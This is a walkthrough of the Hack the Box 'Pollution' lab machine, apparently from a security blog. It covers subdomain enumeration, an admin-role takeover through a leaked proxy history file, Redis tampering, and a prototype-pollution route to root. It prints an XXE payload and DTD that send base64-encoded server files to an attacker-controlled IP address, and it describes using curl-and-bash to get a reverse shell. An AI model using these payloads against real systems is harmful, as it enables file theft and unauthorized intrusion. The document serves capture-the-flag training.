In this post, I would like to share a walkthrough of the Pollution Machine from Hack the Box

This room will be considered a Hard machine on Hack the Box

What will you gain from the Pollution machine?

For the user flag, you will need to enumerate the website via burpsuite and find an attachment that contains a token to which we can take advantage of admin privileges to access the website. We can execute the XML external entity (XXE) injection. We also can obtain the access to redis server which we can modify to get access to the developer’s site. Once we access the developer’s site, we can execute the PHP filter Injection to obtain the reverse shell connection.

As for the root flag, you need to exploit a prototype pollution vulnerability which we should get execution and a shell on the root shell

Information Gathering on Pollution Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN

Let’s access the website interface

On the website interface, there’s not much of thing that we can login and register function

Therefore, let’s register our new account as shown in the screenshot above.

Let’s try to login with the credentials that we created earlier.

As a result, we have successfully accessed the home page which means we managed to register and login to the page.

From the gobuster output, we have managed to sight a subdomain for the machine such as forum.collect.htb and developers.collect.htb

The screenshot above shows the website interface for the forum interface

Sadly, we don’t have any credentials that we can use to login over here.

Enumerate the subdomain “forum.collect.htb”

When we analyze the forum page, I notice that there are a few users available within the member list

Let’s register the username on the forum website

Finally, we have successfully registered and login on to the forum’s dashboard

There is one message left on the forum that sounds like “I am unable to login to the Pollution API” by Victor

As shown in the screenshot above, Victor did leave an attachment of the proxy_history

Inside the proxy_history file, I found a base64 encoded which could be useful for us

We have obtained the packet which leads to setting the admin role

The screenshot above shows the original packet for the collect.htb

We should set our account role as admin via Burpsuite

At last, we managed to access the admin page on the collect.htb

The screenshot above shows the interface on the browser version.

XXE attack on the machine

The website interface has an xxe vulnerability that we can take advantage of.

The user already exists

Let’s start our Python server on our machine itself.

<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource=../index.php'>
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://<IP ADDRESS>/?file=%file;'>">

The dtd code can be written as shown above

We should execute the XXE attack which uses the payload as shown below

manage_api=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<IP ADDRESS>/dark.dtd"> %xxe;]><root>

By default, we can use and change the payload so that we can retrieve any file from our attacker’s machine.

We managed to obtain a hash from the attack

The hash has been identified as apache md5

At last, we managed to obtain a password from the hashes

Redis-Cli command

Therefore, let’s connect the redis-cli command as shown in the screenshot above

We should be giving permission from the admin to our own user “darknite”

At last, we managed to access the dashboard using those credentials.

We are required to create a file that contains a reverse shell

As a result, let’s start our Python server

We should generate the PHP filter for PHPinfo which we can test for the visible purpose

Boom! We have managed to be sighted on the PHPinfo which we know the PHP filter works

Let’s try the command injection for this purpose

As we expected, it works which it provides the output of “www-data”

Therefore, let’s replace the command with trying to curl our malicious file and execute it as bash

Therefore, we managed to upload the malicious file to the machine

As a result, we have successfully accessed the machine via the reverse shell

We have a bunch of PHP files that we could investigate into

Enumerate the MySQL database

From one of the PHP files, we found a password for the MySQL database.

At last, we should be accessing the MySQL database via the credentials that we found earlier.

However, there’s nothing that we can use from the MySQL database.

When looking at the port that has been open on the machine, i notice that there’s one port which not commonly used.

We should transfer the that we download from here

By default, we should be able to execute the command above but sadly it shows the error “File not found”

As a result, we should create the file “darknite.php”

Boom! We have the command injection to work on the machine

Therefore, let’s add our own SSH public key to the machine

Finally, we managed to access the machine via SSH service

We can read the user flag by typing the “cat user.txt” command

Another method to get a foothold on pollution machine

Sadly, it doesn’t work anymore when i try to test the Python script before this writeup is release

We managed to see there is a user called Victor that runs bash

We should be creating a bash file that contains something as shown above which the script can be found here

As a result, we should be able to run the file in order to retrieve a reverse connection

Finally, we managed to obtain the reverse shell connection back to us.

Escalate to Root Privileges Access

After roaming the. machine, i notice that there’s a file in which i found a pollution_api directory that we can investigate later.

We can access back the MySQL database, but we will be using the pollution_api these times.

There are two tables which we can investigate the user’s tables

However, there’s nothing useful from the user’s tables but we can change the roles instead

The command above will update the database from a normal user to an admin role

We can trigger the database by running the “curl” command

Boom! The /bin/bash has been change to SUID binary which we can change to a root shell

We can read the root flag by typing the “cat /root/root.txt” command

Extra Information